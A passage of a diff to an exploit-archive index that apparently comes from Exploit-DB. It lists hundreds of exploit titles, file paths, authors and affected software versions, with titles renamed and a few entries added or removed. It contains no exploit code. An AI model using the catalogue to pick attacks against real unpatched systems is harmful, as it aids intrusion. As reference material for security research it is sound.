AnyConnect Secure Mobility Client 3.1.08009 - Local Privilege Escalation",2015-09-22,"Google Security Research",local,windows, 38298,exploits/linux/local/38298.txt,"xNBD - '/tmp/xnbd.log' Insecure Temporary File Handling",2013-02-06,"Sebastian Pipping",local,linux, -38299,exploits/windows/local/38299.txt,"Symantec Encryption Desktop 10 - Local Buffer Overflow / Privilege Escalation",2012-02-25,"Nikita Tarakanov",local,windows, +38299,exploits/windows/local/38299.txt,"Symantec Encryption Desktop 10 - Local Buffer Overflow / Local Privilege Escalation",2012-02-25,"Nikita Tarakanov",local,windows, 38303,exploits/osx/local/38303.c,"Cisco AnyConnect 3.1.08009 - Local Privilege Escalation (via DMG Install Script)",2015-09-23,"Yorick Koster",local,osx, 38447,exploits/multiple/local/38447.pl,"libsndfile 1.0.25 - Local Heap Overflow",2015-10-13,"Marco Romano",local,multiple, 38319,exploits/windows/local/38319.py,"WinRar 5.21 - SFX OLE Command Execution",2015-09-25,R-73eN,local,windows, @@ -8905,7 +8906,7 @@ id,file,description,date,author,type,platform,port 38423,exploits/windows/local/38423.py,"VeryPDF Image2PDF Converter - Local Buffer Overflow (SEH)",2015-10-08,"Robbie Corley",local,windows, 38456,exploits/windows/local/38456.py,"Boxoft WAV to MP3 Converter 1.1 - Local Buffer Overflow (SEH)",2015-10-14,ArminCyber,local,windows, 38452,exploits/windows/local/38452.txt,"CDex Genre 1.79 - Local Stack Buffer Overflow",2015-10-13,Un_N0n,local,windows, -38467,exploits/windows/local/38467.py,"AdobeWorkgroupHelper 2.8.3.3 - Stack Based Buffer Overflow",2015-10-15,hyp3rlinx,local,windows, +38467,exploits/windows/local/38467.py,"AdobeWorkgroupHelper 2.8.3.3 - Local Stack Buffer Overflow",2015-10-15,hyp3rlinx,local,windows, 38472,exploits/windows/local/38472.py,"Blat 2.7.6 SMTP / NNTP Mailer - Local Buffer Overflow",2015-10-15,hyp3rlinx,local,windows, 38473,exploits/linux/local/38473.py,"Linux 3.17 - 'Python ctypes and memfd_create' noexec File Security Bypass",2015-10-15,soyer,local,linux, 38474,exploits/windows/local/38474.txt,"Microsoft Windows 10 - Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111)",2015-10-15,"Google Security Research",local,windows, @@ -8940,7 +8941,6 @@ id,file,description,date,author,type,platform,port 39010,exploits/linux/local/39010.c,"QEMU (Gentoo) - Local Privilege Escalation",2015-12-17,zx2c4,local,linux, 39035,exploits/win_x86-64/local/39035.txt,"Microsoft Windows 8.1 - 'win32k' Local Privilege Escalation (MS15-010)",2015-12-18,"Jean-Jamil Khalife",local,win_x86-64, 39061,exploits/android/local/39061.txt,"GoToMeeting for Android - Multiple Local Information Disclosure Vulnerabilities",2014-01-23,"Claudio J. Lacayo",local,android, -39102,exploits/windows/local/39102.py,"EasyCafe Server 2.2.14 - Remote File Read",2015-12-26,R-73eN,local,windows, 39112,exploits/linux/local/39112.txt,"QNX - '.Phgrafx' File Enumeration",2014-03-10,cenobyte,local,linux, 39120,exploits/windows/local/39120.py,"KiTTY Portable 0.65.1.1p - Local Saved Session Overflow (Egghunter XP / Denial of Service 7/8.1/10)",2015-12-29,"Guillaume Kaddouch",local,windows, 39121,exploits/windows/local/39121.py,"KiTTY Portable 0.65.0.2p (Windows 7) - Local kitty.ini Overflow (Wow64 Egghunter)",2015-12-29,"Guillaume Kaddouch",local,windows, @@ -8956,8 +8956,8 @@ id,file,description,date,author,type,platform,port 39230,exploits/linux/local/39230.c,"Linux Kernel 4.3.3 - 'overlayfs' Local Privilege Escalation (2)",2016-01-12,halfdog,local,linux, 39244,exploits/linux/local/39244.txt,"Amanda 3.3.1 - 'amstar' Command Injection Privilege Escalation",2016-01-15,"Hacker Fantastic",local,linux, 39260,exploits/windows/local/39260.txt,"WEG SuperDrive G2 12.0.0 - Insecure File Permissions",2016-01-18,LiquidWorm,local,windows, -39277,exploits/linux/local/39277.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Privilege Escalation (1)",2016-01-19,"Perception Point Team",local,linux, -40003,exploits/linux/local/40003.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Privilege Escalation (2)",2016-01-19,"Federico Bento",local,linux, +39277,exploits/linux/local/39277.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (1)",2016-01-19,"Perception Point Team",local,linux, +40003,exploits/linux/local/40003.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (2)",2016-01-19,"Federico Bento",local,linux, 39284,exploits/windows/local/39284.txt,"Oracle - 'HtmlConverter.exe' Local Buffer Overflow",2016-01-21,hyp3rlinx,local,windows, 39285,exploits/linux/local/39285.py,"xWPE 1.5.30a-2.1 - Local Buffer Overflow",2016-01-21,"Juan Sacco",local,linux, 40337,exploits/win_x86-64/local/40337.py,"MySQL 5.5.45 (x64) - Local Credentials Disclosure",2016-09-05,"Yakir Wizman",local,win_x86-64, @@ -8997,7 +8997,7 @@ id,file,description,date,author,type,platform,port 39675,exploits/osx/local/39675.c,"Apple Intel HD 3000 Graphics Driver 10.0.0 - Local Privilege Escalation",2016-04-08,"Piotr Bania",local,osx, 39680,exploits/windows/local/39680.txt,"CAM UnZip 5.1 - .'ZIP' File Directory Traversal",2016-04-11,hyp3rlinx,local,windows, 39692,exploits/linux/local/39692.py,"Texas Instrument Emulator 3.03 - Local Buffer Overflow",2016-04-13,"Juan Sacco",local,linux, -39694,exploits/windows/local/39694.txt,"Microsoft Excel - Out-of-Bounds Read Remote Code Execution (MS16-042)",2016-04-14,"Sébastien Morin",local,windows, +39694,exploits/windows/local/39694.txt,"Microsoft Excel - Out-of-Bounds Read Code Execution (MS16-042)",2016-04-14,"Sébastien Morin",local,windows, 39702,exploits/linux/local/39702.rb,"Exim - 'perl_startup' Local Privilege Escalation (Metasploit)",2016-04-15,Metasploit,local,linux, 39967,exploits/linux/local/39967.txt,"SolarWinds Virtualization Manager - Local Privilege Escalation",2016-06-16,"Nate Kettlewell",local,linux, 39719,exploits/windows/local/39719.ps1,"Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) - Local Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,local,windows, @@ -9005,7 +9005,7 @@ id,file,description,date,author,type,platform,port 39734,exploits/linux/local/39734.py,"Yasr Screen Reader 0.6.9 - Local Buffer Overflow",2016-04-26,"Juan Sacco",local,linux, 39741,exploits/osx/local/39741.txt,"Mach Race OSX - Local Privilege Escalation",2016-04-27,fG!,local,osx, 39757,exploits/android/local/39757.txt,"QSEE - PRDiag* Commands Privilege Escalation",2016-05-02,laginimaineb,local,android, -39764,exploits/linux/local/39764.py,"TRN Threaded USENET News Reader 3.6-23 - Local Stack Based Overflow",2016-05-04,"Juan Sacco",local,linux, +39764,exploits/linux/local/39764.py,"TRN Threaded USENET News Reader 3.6-23 - Local Stack Overflow",2016-05-04,"Juan Sacco",local,linux, 39769,exploits/linux/local/39769.txt,"Zabbix Agent 3.0.1 - mysql.size Shell Command Injection",2016-05-04,"Timo Lindfors",local,linux, 39771,exploits/linux/local/39771.txt,"Linux Kernel (Ubuntu 14.04.3) - 'perf_event_open()' Can Race with execve() (Access /etc/shadow)",2016-05-04,"Google Security Research",local,linux, 39772,exploits/linux/local/39772.txt,"Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation",2016-05-04,"Google Security Research",local,linux, @@ -9015,7 +9015,7 @@ id,file,description,date,author,type,platform,port 39803,exploits/windows/local/39803.txt,"FileZilla FTP Client 3.17.0.0 - Unquoted Path Privilege Escalation",2016-05-11,"Cyril Vallicari",local,windows, 39804,exploits/windows/local/39804.txt,"Intuit QuickBooks Desktop 2007 < 2016 - Arbitrary Code Execution",2016-05-11,"Maxim Tomashevich",local,windows, 39809,exploits/windows/local/39809.cs,"Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Local Privilege Escalation (MS16-032) (C#)",2016-04-25,fdiskyou,local,windows, -39810,exploits/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack Based Overflow",2016-05-13,"Juan Sacco",local,linux, +39810,exploits/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack Overflow",2016-05-13,"Juan Sacco",local,linux, 39811,exploits/linux/local/39811.txt,"runAV mod_security - Arbitrary Command Execution",2016-05-13,R-73eN,local,linux, 39814,exploits/windows/local/39814.txt,"Multiples Nexon Games - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",local,windows, 39820,exploits/windows/local/39820.txt,"Hex : Shard of Fate 1.0.1.026 - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",local,windows, @@ -9033,7 +9033,7 @@ id,file,description,date,author,type,platform,port 40054,exploits/linux/local/40054.c,"Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation",2016-07-04,halfdog,local,linux, 39980,exploits/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - Local Stack Overflow (SEH) (Metasploit)",2016-06-20,s0nk3y,local,windows, 39984,exploits/win_x86-64/local/39984.txt,"ACROS Security 0patch 2016.05.19.539 - '0PatchServicex64.exe' Unquoted Service Path Privilege Escalation",2016-06-20,LiquidWorm,local,win_x86-64, -39992,exploits/linux/local/39992.txt,"Linux - ecryptfs and /proc/$pid/environ Privilege Escalation",2016-06-21,"Google Security Research",local,linux, +39992,exploits/linux/local/39992.md,"Linux - 'ecryptfs' '/proc/$pid/environ' Local Privilege Escalation",2016-06-21,"Google Security Research",local,linux, 40017,exploits/windows/local/40017.py,"Mediacoder 0.8.43.5830 - '.m3u' Local Buffer Overflow (SEH)",2016-06-27,"Sibusiso Sishi",local,windows, 40018,exploits/windows/local/40018.py,"VUPlayer 2.49 (Windows 7) - '.m3u' Local Buffer Overflow (DEP Bypass)",2016-06-27,secfigo,local,windows, 40020,exploits/windows/local/40020.txt,"Panda Security (Multiple Products) - Local Privilege Escalation",2016-06-27,Security-Assessment.com,local,windows, @@ -9041,7 +9041,6 @@ id,file,description,date,author,type,platform,port 40025,exploits/linux/local/40025.py,"HNB 1.9.18-10 - Local Buffer Overflow",2016-06-27,"Juan Sacco",local,linux, 40039,exploits/win_x86/local/40039.cpp,"Microsoft Windows 7 SP1 (x86) - Local Privilege Escalation (MS16-014)",2016-06-29,blomster81,local,win_x86, 40040,exploits/windows/local/40040.txt,"Lenovo ThinkPad - System Management Mode Arbitrary Code Execution",2016-06-29,Cr4sh,local,windows, -40043,exploits/windows/local/40043.py,"Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution",2016-06-29,"Rémi ROCHER",local,windows, 40049,exploits/lin_x86-64/local/40049.c,"Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation",2016-07-03,vnik,local,lin_x86-64, 40066,exploits/android/local/40066.txt,"Samsung Android JACK - Local Privilege Escalation",2016-07-06,"Google Security Research",local,android, 40069,exploits/windows/local/40069.cpp,"GE Proficy HMI/SCADA CIMPLICITY 8.2 - Local Privilege Escalation",2016-07-07,"Zhou Yu",local,windows, @@ -9061,7 +9060,7 @@ id,file,description,date,author,type,platform,port 40173,exploits/windows/local/40173.txt,"mySCADAPro 7 - Local Privilege Escalation",2016-07-29,"Karn Ganeshen",local,windows, 40203,exploits/linux/local/40203.py,"zFTP Client 20061220 - 'Connection Name' Local Buffer Overflow",2016-08-05,"Juan Sacco",local,linux, 40219,exploits/windows/local/40219.txt,"Microsoft Windows 7 (x86/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",local,windows, -40224,exploits/windows/local/40224.txt,"Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Remote Code Execution (MS16-099)",2016-08-10,COSIG,local,windows, +40224,exploits/windows/local/40224.txt,"Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Code Execution (MS16-099)",2016-08-10,COSIG,local,windows, 40226,exploits/windows/local/40226.txt,"EyeLock Myris 3.3.2 - SDK Service Unquoted Service Path Privilege Escalation",2016-08-10,LiquidWorm,local,windows, 40268,exploits/windows/local/40268.rb,"Microsoft Windows - Fileless UAC Protection Bypass Privilege Escalation (Metasploit)",2016-08-19,"Pablo González",local,windows, 40270,exploits/linux/local/40270.txt,"Watchguard Firewalls - 'ESCALATEPLOWMAN' ifconfig Privilege Escalation",2016-08-19,"Shadow Brokers",local,linux, @@ -9129,7 +9128,7 @@ id,file,description,date,author,type,platform,port 40636,exploits/windows/local/40636.txt,"HP TouchSmart Calendar 4.1.4245 - Insecure File Permissions Privilege Escalation",2016-10-27,hyp3rlinx,local,windows, 40653,exploits/osx/local/40653.txt,"Apple OS X/iOS Kernel - IOSurface Use-After-Free",2016-10-31,"Google Security Research",local,osx, 40655,exploits/windows/local/40655.txt,"NVIDIA Driver - UVMLiteController ioctl Handling Unchecked Input/Output Lengths Privilege Escalation",2016-10-31,"Google Security Research",local,windows, -40660,exploits/windows/local/40660.txt,"NVIDIA Driver - NvStreamKms 'PsSetCreateProcessNotifyRoutineEx Stack Buffer Overflow Callback / Privilege Escalation",2016-10-31,"Google Security Research",local,windows, +40660,exploits/windows/local/40660.txt,"NVIDIA Driver - NvStreamKms 'PsSetCreateProcessNotifyRoutineEx Local Stack Buffer Overflow Callback / Local Privilege Escalation",2016-10-31,"Google Security Research",local,windows, 40669,exploits/macos/local/40669.txt,"Apple macOS 10.12 - 'task_t' Local Privilege Escalation",2016-10-31,"Google Security Research",local,macos, 40678,exploits/linux/local/40678.c,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'mysql' System User Privilege Escalation / Race Condition",2016-11-01,"Dawid Golunski",local,linux, 40686,exploits/multiple/local/40686.txt,"Citrix Receiver/Receiver Desktop Lock 4.5 - Authentication Bypass",2016-11-02,"Rithwik Jayasimha",local,multiple, @@ -9173,16 +9172,16 @@ id,file,description,date,author,type,platform,port 40995,exploits/windows/local/40995.txt,"Advanced Desktop Locker 6.0.0 - Lock Screen Bypass",2017-01-08,Squnity,local,windows, 41015,exploits/windows/local/41015.c,"Microsoft Windows Kernel - 'win32k.sys NtSetWindowLongPtr' Local Privilege Escalation (MS16-135) (2)",2017-01-08,"Rick Larabee",local,windows, 41020,exploits/win_x86-64/local/41020.c,"Microsoft Windows 8.1 (x64) - 'RGNOBJ' Integer Overflow (MS16-098)",2017-01-03,Saif,local,win_x86-64, -41021,exploits/multiple/local/41021.txt,"Cemu 1.6.4b - Information Leak / Buffer Overflow (Emulator Breakout)",2017-01-09,Wack0,local,multiple, +41021,exploits/multiple/local/41021.md,"Cemu 1.6.4b - Information Leak / Buffer Overflow (Emulator Breakout)",2017-01-09,Wack0,local,multiple, 41022,exploits/linux/local/41022.txt,"Firejail - Local Privilege Escalation",2017-01-09,"Daniel Hodson",local,linux, 41076,exploits/linux/local/41076.py,"iSelect v1.4 - Local Buffer Overflow",2017-01-16,"Juan Sacco",local,linux, 41090,exploits/windows/local/41090.py,"SentryHD 02.01.12e - Local Privilege Escalation",2017-01-18,"Kacper Szurek",local,windows, 41130,exploits/android/local/41130.txt,"Google Android TSP sysfs - 'cmd_store' Multiple Overflows",2017-01-19,"Google Security Research",local,android, 41144,exploits/windows/local/41144.txt,"Microsoft Power Point 2016 - Java Code Execution",2017-01-21,"Fady Mohammed Osman",local,windows, -41149,exploits/osx/local/41149.txt,"Microsoft Remote Desktop Client for Mac 8.0.36 - Remote Code Execution",2017-01-23,"Filippo Cavallarin",local,osx, +41149,exploits/osx/local/41149.md,"Microsoft Remote Desktop Client for Mac 8.0.36 - Code Execution",2017-01-23,"Filippo Cavallarin",local,osx, 41152,exploits/linux/local/41152.txt,"GNU Screen 4.5.0 - Local Privilege Escalation (PoC)",2017-01-24,"Donald Buczek",local,linux, 41154,exploits/linux/local/41154.sh,"GNU Screen 4.5.0 - Local Privilege Escalation",2017-01-25,"Xiphos Research Ltd",local,linux, -41158,exploits/linux/local/41158.txt,"Man-db 2.6.7.1 - Local Privilege Escalation (PoC)",2015-12-02,halfdog,local,linux, +41158,exploits/linux/local/41158.md,"Man-db 2.6.7.1 - Local Privilege Escalation (PoC)",2015-12-02,halfdog,local,linux, 41171,exploits/linux/local/41171.txt,"Systemd 228 (SUSE 12 SP2 / Ubuntu Touch 15.04) - Local Privilege Escalation (PoC)",2017-01-24,"Sebastian Krahmer",local,linux, 41173,exploits/linux/local/41173.c,"OpenSSH 6.8 < 6.9 - 'PTY' Local Privilege Escalation",2017-01-26,"Federico Bento",local,linux, 41176,exploits/windows/local/41176.c,"Palo Alto Networks Terminal Services Agent 7.0.3-13 - Integer Overflow",2017-01-26,"Parvez Anwar",local,windows, @@ -9208,7 +9207,7 @@ id,file,description,date,author,type,platform,port 41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android, 41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple, 41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows, -41701,exploits/windows/local/41701.rb,"Malwarebytes Anti-Malware < 2.0.3 / Anti-Exploit < 1.03.1.1220 - Update Remote Code Execution (Metasploit)",2014-12-16,Metasploit,local,windows, +41701,exploits/windows/local/41701.rb,"Malwarebytes Anti-Malware < 2.0.3 / Anti-Exploit < 1.03.1.1220 - Update Code Execution (Metasploit)",2014-12-16,Metasploit,local,windows, 41702,exploits/windows/local/41702.rb,"Microsoft Silverlight - ScriptObject Unsafe Memory Access (MS13-022/MS13-087) (Metasploit)",2013-03-12,Metasploit,local,windows, 41704,exploits/windows/local/41704.rb,"EMC Replication Manager < 5.3 - Command Execution (Metasploit)",2011-02-27,Metasploit,local,windows, 41706,exploits/windows/local/41706.rb,"Microsoft Office - OLE Multiple DLL Side Loading Vulnerabilities (MS15-132/MS16-014/MS16-025/MS16-041/MS16-070) (Metasploit)",2015-12-08,Metasploit,local,windows, @@ -9306,7 +9305,7 @@ id,file,description,date,author,type,platform,port 42549,exploits/windows/local/42549.py,"Easy AVI DivX Converter 1.2.24 - Local Buffer Overflow (SEH)",2017-08-24,"Anurag Srivastava",local,windows, 42385,exploits/windows/local/42385.py,"AudioCoder 0.8.46 - Local Buffer Overflow (SEH)",2017-07-26,Muhann4d,local,windows, 42407,exploits/multiple/local/42407.txt,"iOS/macOS - xpc_data Objects Sandbox Escape Privelege Escalation",2017-08-01,"Google Security Research",local,multiple, -42418,exploits/windows/local/42418.rb,"Nitro Pro PDF Reader 11.0.3.173 - Javascript API Remote Code Execution (Metasploit)",2017-08-02,Metasploit,local,windows, +42418,exploits/windows/local/42418.rb,"Nitro Pro PDF Reader 11.0.3.173 - Javascript API Code Execution (Metasploit)",2017-08-02,Metasploit,local,windows, 42424,exploits/linux/local/42424.py,"DNSTracer 1.9 - Local Buffer Overflow",2017-08-03,j0lama,local,linux, 42425,exploits/windows/local/42425.txt,"VirtualBox 5.1.22 - Windows Process DLL Signature Bypass Privilege Escalation",2017-08-03,"Google Security Research",local,windows, 42426,exploits/windows/local/42426.txt,"VirtualBox 5.1.22 - Windows Process DLL UNC Path Signature Bypass Privilege Escalation",2017-08-03,"Google Security Research",local,windows, @@ -9319,7 +9318,7 @@ id,file,description,date,author,type,platform,port 42460,exploits/osx/local/42460.py,"NoMachine 5.3.9 - Local Privilege Escalation",2017-08-09,"Daniele Linguaglossa",local,osx, 42521,exploits/windows/local/42521.py,"Easy DVD Creater 2.5.11 - Local Buffer Overflow (SEH)",2017-08-19,"Anurag Srivastava",local,windows, 42536,exploits/windows/local/42536.py,"Disk Pulse Enterprise 9.9.16 - 'Import Command' Local Buffer Overflow",2017-08-22,"Anurag Srivastava",local,windows, -42537,exploits/windows/local/42537.txt,"PDF-XChange Viewer 2.5 Build 314.0 - Remote Code Execution",2017-08-21,"Daniele Votta",local,windows, +42537,exploits/windows/local/42537.txt,"PDF-XChange Viewer 2.5 Build 314.0 - Code Execution",2017-08-21,"Daniele Votta",local,windows, 42538,exploits/windows/local/42538.py,"Disk Savvy Enterprise 9.9.14 - 'Import Command' Local Buffer Overflow",2017-08-22,"Anurag Srivastava",local,windows, 42539,exploits/windows/local/42539.py,"VX Search Enterprise 9.9.12 - 'Import Command' Local Buffer Overflow",2017-08-22,"Anurag Srivastava",local,windows, 42540,exploits/windows/local/42540.rb,"Microsoft Windows - Escalate UAC Protection Bypass (Via COM Handler Hijack) (Metasploit)",2017-08-22,Metasploit,local,windows, @@ -9331,10 +9330,10 @@ id,file,description,date,author,type,platform,port 42605,exploits/windows/local/42605.txt,"Lotus Notes Diagnostic Tool 8.5/9.0 - Local Privilege Escalation",2017-09-02,ParagonSec,local,windows, 42611,exploits/linux/local/42611.txt,"RubyGems < 2.6.13 - Arbitrary File Overwrite",2017-09-04,mame,local,linux, 42612,exploits/windows/local/42612.py,"Dup Scout Enterprise 9.9.14 - 'Input Directory' Local Buffer Overflow",2017-09-04,"Touhid M.Shaikh",local,windows, -42624,exploits/windows/local/42624.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Privilege Escalation (1)",2017-09-06,mr_me,local,windows, +42624,exploits/windows/local/42624.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Local Privilege Escalation (1)",2017-09-06,mr_me,local,windows, 42625,exploits/windows/local/42625.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Out-of-Bounds Write Privilege Escalation",2017-09-06,mr_me,local,windows, 42626,exploits/linux/local/42626.c,"Tor (Linux) - X11 Linux Sandbox Breakout",2017-09-06,"Google Security Research",local,linux, -42665,exploits/windows/local/42665.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Privilege Escalation (2)",2017-09-12,mr_me,local,windows, +42665,exploits/windows/local/42665.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Local Privilege Escalation (2)",2017-09-12,mr_me,local,windows, 42718,exploits/windows/local/42718.rb,"MPlayer - '.SAMI' Subtitle File Buffer Overflow (DEP Bypass) (Metasploit)",2011-06-14,"James Fitts",local,windows, 42735,exploits/windows/local/42735.c,"Netdecision 5.8.2 - Local Privilege Escalation",2017-09-16,"Peter Baris",local,windows, 42777,exploits/windows/local/42777.py,"CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode)",2017-09-23,f3ci,local,windows, @@ -9342,8 +9341,8 @@ id,file,description,date,author,type,platform,port 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows, 42921,exploits/windows/local/42921.py,"Dup Scout Enterprise 10.0.18 - 'Import Command' Local Buffer Overflow",2017-09-29,"Touhid M.Shaikh",local,windows, 42930,exploits/windows/local/42930.txt,"Microsoft Word 2007 (x86) - Information Disclosure",2017-09-30,"Eduardo Braun Prado",local,windows, -42936,exploits/linux/local/42936.txt,"UCOPIA Wireless Appliance < 5.1.8 - Local Privilege Escalation",2017-10-02,Sysdream,local,linux, -42937,exploits/linux/local/42937.txt,"UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape",2017-10-02,Sysdream,local,linux, +42936,exploits/linux/local/42936.md,"UCOPIA Wireless Appliance < 5.1.8 - Local Privilege Escalation",2017-10-02,Sysdream,local,linux, +42937,exploits/linux/local/42937.md,"UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape",2017-10-02,Sysdream,local,linux, 42948,exploits/osx/local/42948.txt,"Apple Mac OS X + Safari - Local Javascript Quarantine Bypass",2017-07-15,"Filippo Cavallarin",local,osx, 42951,exploits/windows/local/42951.py,"DiskBoss Enterprise 8.4.16 - Local Buffer Overflow",2017-10-03,C4t0ps1s,local,windows, 42960,exploits/win_x86-64/local/42960.txt,"Microsoft Windows 10 RS2 (x64) - 'win32kfull!bFill' Pool Overflow",2017-10-06,siberas,local,win_x86-64, @@ -9365,6 +9364,8 @@ id,file,description,date,author,type,platform,port 43162,exploits/windows/local/43162.txt,"Microsoft Windows 10 - CiSetFileCache TOCTOU Security Feature Bypass",2017-11-20,"Google Security Research",local,windows, 43179,exploits/windows/local/43179.py,"ALLPlayer 7.5 - Local Buffer Overflow (SEH Unicode)",2017-11-25,sickness,local,windows, 43187,exploits/windows/local/43187.txt,"Diving Log 6.0 - XML External Entity Injection",2017-11-27,"Trent Gordon",local,windows, +43192,exploits/win_x86/local/43192.c,"Microsoft Windows 10 Creators Update (version 1703) (x86) - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation",2017-11-27,XPN,local,win_x86, +43201,exploits/macos/local/43201.rb,"macOS High Sierra - Root Privilege Escalation (Metasploit)",2017-11-30,Metasploit,local,macos, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote (PoC)",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -9448,7 +9449,7 @@ id,file,description,date,author,type,platform,port 135,exploits/windows/remote/135.c,"Microsoft Windows Messenger Service (French) - Remote (MS03-043)",2003-12-16,MrNice,remote,windows,135 136,exploits/windows/remote/136.pl,"Eznet 3.5.0 - Remote Stack Overflow Universal",2003-12-18,kralor,remote,windows,80 139,exploits/linux/remote/139.c,"Cyrus IMSPD 1.7 - 'abook_dbname' Remote Code Execution",2003-12-27,SpikE,remote,linux,406 -143,exploits/linux/remote/143.c,"lftp 2.6.9 - Remote Stack based Overflow",2004-01-14,Li0n7,remote,linux, +143,exploits/linux/remote/143.c,"lftp 2.6.9 - Remote Stack Overflow",2004-01-14,Li0n7,remote,linux, 149,exploits/windows/remote/149.c,"RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Remote Overflow",2004-01-27,lion,remote,windows,21 151,exploits/windows/remote/151.txt,"Microsoft Internet Explorer - URL Injection in History List (MS04-004)",2004-02-04,"Andreas Sandblad",remote,windows, 155,exploits/windows/remote/155.c,"Proxy-Pro Professional GateKeeper Pro 4.7 - Web proxy Remote Buffer Overflow",2004-02-26,kralor,remote,windows,3128 @@ -9772,13 +9773,13 @@ id,file,description,date,author,type,platform,port 1380,exploits/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 - 'IMAPd' Remote Overflow",2005-12-20,muts,remote,windows,143 1381,exploits/windows/remote/1381.pm,"Golden FTP Server 1.92 - 'APPE' Remote Overflow (Metasploit)",2005-12-20,redsand,remote,windows,21 1391,exploits/windows/remote/1391.pm,"Microsoft Windows XP/2003 - Metafile Escape() Code Execution (Metasploit)",2005-12-27,"H D Moore",remote,windows, -1408,exploits/windows/remote/1408.pl,"BlueCoat WinProxy 6.0 R1c - 'Host' Remote Stack/SEH Overflow",2006-01-07,FistFuXXer,remote,windows,80 +1408,exploits/windows/remote/1408.pl,"BlueCoat WinProxy 6.0 R1c - 'Host' Remote Stack Overflow (SEH)",2006-01-07,FistFuXXer,remote,windows,80 1413,exploits/windows/remote/1413.c,"eStara SoftPhone 3.0.1.46 - SIP Remote Buffer Overflow (1)",2006-01-12,ZwelL,remote,windows, 1414,exploits/windows/remote/1414.pl,"eStara SoftPhone 3.0.1.46 - SIP Remote Buffer Overflow (2)",2006-01-12,kokanin,remote,windows,5060 1417,exploits/windows/remote/1417.pl,"Farmers WIFE 4.4 sp1 - 'FTP' Remote System Access",2006-01-14,kokanin,remote,windows,22003 1420,exploits/windows/remote/1420.c,"Microsoft Windows - Metafile '.WMF' Arbitrary File Download (Generator)",2006-01-15,darkeagle,remote,windows, 1421,exploits/windows/remote/1421.cpp,"Veritas NetBackup 4/5 - Volume Manager Daemon Remote Buffer Overflow",2006-01-16,"Patrick Thomassen",remote,windows,13701 -1448,exploits/windows/remote/1448.pl,"KarjaSoft Sami FTP Server 2.0.1 - Remote Stack Based Buffer Overflow (PoC)",2006-01-25,"Critical Security",remote,windows, +1448,exploits/windows/remote/1448.pl,"KarjaSoft Sami FTP Server 2.0.1 - Remote Stack Buffer Overflow (PoC)",2006-01-25,"Critical Security",remote,windows, 1452,exploits/windows/remote/1452.pm,"KarjaSoft Sami FTP Server 2.0.1 - Remote Buffer Overflow (Metasploit)",2006-01-25,redsand,remote,windows,21 1456,exploits/linux/remote/1456.c,"SHOUTcast 1.9.4 - File Request 'Leaked' Format String",2006-01-28,crash-x,remote,linux,8000 1458,exploits/windows/remote/1458.cpp,"Winamp 5.12 - '.pls' Remote Buffer Overflow (1)",2006-01-29,ATmaCA,remote,windows, @@ -11028,7 +11029,7 @@ id,file,description,date,author,type,platform,port 15866,exploits/windows/remote/15866.html,"Chilkat Software FTP2 - ActiveX Component Remote Code Execution",2010-12-30,rgod,remote,windows, 15868,exploits/windows/remote/15868.pl,"QuickPHP Web Server - Arbitrary '.php' File Download",2010-12-30,"Yakir Wizman",remote,windows, 15869,exploits/windows/remote/15869.txt,"CA ARCserve D2D r15 - Web Service Servlet Code Execution",2010-12-30,rgod,remote,windows, -15885,exploits/windows/remote/15885.html,"HP Photo Creative 2.x audio.Record.1 - ActiveX Control Remote Stack Based Buffer Overflow",2011-01-01,rgod,remote,windows, +15885,exploits/windows/remote/15885.html,"HP Photo Creative 2.x audio.Record.1 - ActiveX Control Remote 